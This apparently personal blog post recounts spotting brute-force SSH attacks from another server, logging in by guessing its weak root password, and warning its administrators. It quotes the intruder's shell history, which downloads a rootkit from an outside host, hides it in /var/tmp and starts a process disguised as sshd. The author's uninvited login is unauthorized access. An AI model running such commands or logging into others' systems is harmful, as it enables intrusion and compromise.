![[FSF Associate Member]](http://image.thilosophy.com/fsfMember.png){kind=small}
I think your server has been hacked !!!
Dear server administrators, I think your server (72.249.xx.xx) has been hacked and is being used for malicious purposes right now. During a routine check of my own server (based in Germany) I found that it was being attacked (brute-force password guessing) from 72.249.xx.xx, which is your server. Trying to find out what to do about this, I tried to log in (via ssh) to your server, which was trivially possible (the root password is very, very simple, I guessed it on my first attempt). Please change your password ASAP. While logged in to your server, I could see that a process was probing other servers on the Internet to find more weak passwords. I also saw another user logged in (as root) from 79.116.xx.xx, which may or may not be the attacker. Since I have no business nosing around on your server, I logged out again without doing anything. Best regards, Thilo Planz
I wish my UNIX-fu was stronger, I did not really know what to
do about this, which is probably a good thing, since I really have
no business being on their server. But still, I felt like killing this
guy's processes and blocking his IP. Although, I suppose this whole
thing is an automated process, and he
would not even notice me
slapping his fingers.
What I could see is that he was spawning lots of ssh processes, apparently searching whole IP ranges for easy root passwords (which is how he must have gotten to this American high school's server).
The command history had this interesting sequence, which downloads a root kit and then starts a hidden web server to propagate itself or maybe remotely control the machine.
252 cd /var/tmp 253 ls -a 254 wget http://63.249.225.72/icons/stealth.tgz 255 tar zxvf stealth.tgz 256 rm -rf stealth.tgz 257 mv l .ls 258 cd .ls 259 ./h -s "/usr/sbin/sshd" ./httpd